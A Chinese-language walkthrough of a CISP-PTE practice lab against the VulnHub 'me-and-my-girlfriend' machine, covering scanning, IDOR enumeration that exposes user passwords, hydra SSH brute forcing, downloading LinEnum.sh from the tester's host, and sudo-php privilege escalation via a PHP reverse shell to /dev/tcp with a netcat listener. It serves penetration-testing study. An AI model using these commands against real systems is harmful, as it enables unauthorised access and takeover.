CISP-PTE靶机练习(me-and-my-girlfriend)

Posted 星球守护者

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了CISP-PTE靶机练习(me-and-my-girlfriend)相关的知识,希望对你有一定的参考价值。

文章目录

靶机地址环境

https://www.vulnhub.com/entry/me-and-my-girlfriend-1,409/

实验操作

0x01拓扑图

0x02 信息收集

第一步 扫描,发现主机

netdiscover 基于arp扫描存活主机
nmap 

第二步 发现端口

nmap -p- -A 192.168.0.107

第三步 扫描目录

使用工具GitHub上的dirsearch(https://github.com/maurosoria/dirsearch/releases/tag/v0.4.2)

 python3 dirsearch.py -u http://192.168.0.107/ -e*
 [09:51:40] 301 -  314B  - /config  ->  http://192.168.0.107/config/         
[09:51:40] 200 -  942B  - /config/                                          
[09:51:48] 200 -  120B  - /index.php                                        
[09:51:48] 200 -  120B  - /index.php/login/                                 
[09:51:52] 301 -  312B  - /misc  ->  http://192.168.0.107/misc/             
[09:52:00] 200 -   32B  - /robots.txt  


第四步 发现路径,并分析(未发现异常)

http://192.168.0.107/misc/
http://192.168.0.107/config/
http://192.168.0.107/robots.txt



第五步 配置数据包,更改请求数据头
可以burpsuit添加字段,或者浏览器插件

第六步 再次访问,发现新的页面

0x03漏洞发现

第一步 发现可疑点
1、通过访问,发现登陆和注册的地方,存在和数据库交付,怀疑存在注入漏洞
2、同时发现目录是拼接的,可能存在目录遍历或者文件包含漏洞

(https://blog.csdn.net/qq_41901122/article/details/104602082?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522165322902116781435449002%2522%252C%2522scm%2522%253A%252220140713.130102334.pc%255Fblog.%2522%257D&request_id=165322902116781435449002&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2~blog~first_rank_ecpm_v1~rank_v31_ecpm-1-104602082-null-null.nonecase&utm_term=%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB&spm=1018.2226.3001.4450)

3、注册的地方,任意用户注册漏洞

http://192.168.0.107/?page=login
http://192.168.0.107/?page=register


第二步 任意用户注册成功,并且登陆进入系统

第三步 越权去遍历用户
在查看个人信息的地方,发现时通过id来查看,所以思路是通过id的遍历,去发现去他用户的用户和密码信息

请求数据包

返回数据包

通过对返回数据包的长度进行排序,发现
返回1418长度的是空值,即ID不存在的
返回值大于1418的,为存在的用户
eweuhtandingan-skuyatuh
sedihaingmah-cedihhihihi
aingmaung-qwerty!!!
abdikasepak-dorrrrr
sundatea-indONEsia
alice-4lic3
test-test

第四步 对第三步的结果继续利用
通过对第三步的账号密码进行依次登陆,发现页面没有异常
回到最初,服务器还开放了22的端口
想到使用ssh的方式去遍历用户名和密码

user.txt
-----------------
eweuhtandingan
sedihaingmah
aingmaung
abdikasepak
sundatea
alice
test
-----------------
pass.txt
-----------------
skuyatuh
cedihhihihi
qwerty!!!
dorrrrr
indONEsia
4lic3
test
-----------------

hydra -L /root/Desktop/use.txt -P /root/Desktop/pass.txt ssh://192.168.0.107

第五步 ssh连接成功

ssh alice@192.168.0.107
4lic3

0x04 提权

第一步 进行提权脚本的检测
先在本地开启一个服务,服务器进行文件传输
python2 -m SimpleHTTPServer

上传一个脚本(一般情况下,/tmp下具有执行权限),使用脚本进行检测

wget http://192.168.0.110:8000/LinEnum.sh 

chmod +x LinEnum.sh 添加执行权限或者添加777权限

./LinEnum.sh
-----------------------------------------------
[+] We can sudo without supplying a password!
Matching Defaults entries for alice on gfriEND:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin\\:/snap/bin

User alice may run the following commands on gfriEND:
    (root) NOPASSWD: /usr/bin/php


[+] Possible sudo pwnage!
/usr/bin/php
-----------------------------------------------


第二步 sudo提权
根据上一步的提示,这个alice可以不用密码的情况下执行PHP语言,思路:
执行PHP脚本(内容是反弹shell脚本,添加执行/bin/bash的权限)
1、服务器端-执行脚本

alice@gfriEND:~$ cat  nc.php 
<?php 
exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.0.110/4444 0>&1'");
?>
alice@gfriEND:~$ chmod +x nc.php 
alice@gfriEND:~$ sudo php nc.php 

2、kali端-监听shell

└─# nc -lvvp 4444
listening on [any] 4444 ...
connect to [192.168.0.110] from bogon [192.168.0.108] 46232
root@gfriEND:~# whoami
whoami
root
root@gfriEND:~# id
id
uid=0(root) gid=0(root) groups=0(root)

第三步 获取falg

cd /root
ls
cat flag4.txt
------------------------------------------------------------------------------
Contact me if you want to contribute / give me feedback / share your writeup!
Twitter: @makegreatagain_
Instagram: @aldodimas73

Thanks! Flag 2: gfriEND56fbeef560930e77ff984b644fde66e7
------------------------------------------------------------------------------

摘抄


大家的生活和工作都很忙碌,有时稍不注意,就容易忘记一些事。

这时,无论是用笔还是手机,最好记下待办的事项、设置好提醒。

亲人的生日,可以定一个提醒;重要的会议,可以定一个提醒;没来得及回复的信息,也可以定一个提醒。

把看似微不足道的每一件小事都放在心上,注重细节,你才会成为一个更靠谱、更优秀的人。

---《设置提醒》


以上是关于CISP-PTE靶机练习(me-and-my-girlfriend)的主要内容,如果未能解决你的问题,请参考以下文章

CISP-PTE考前练习-SQL注入

CISP-PTE考前练习-SQL注入

CISP-PTE考前练习-文件包含

CISP-PTE学习总结之基础练习题

CISP-PTE学习总结之基础练习题

CISP-PTE考前练习-文件包含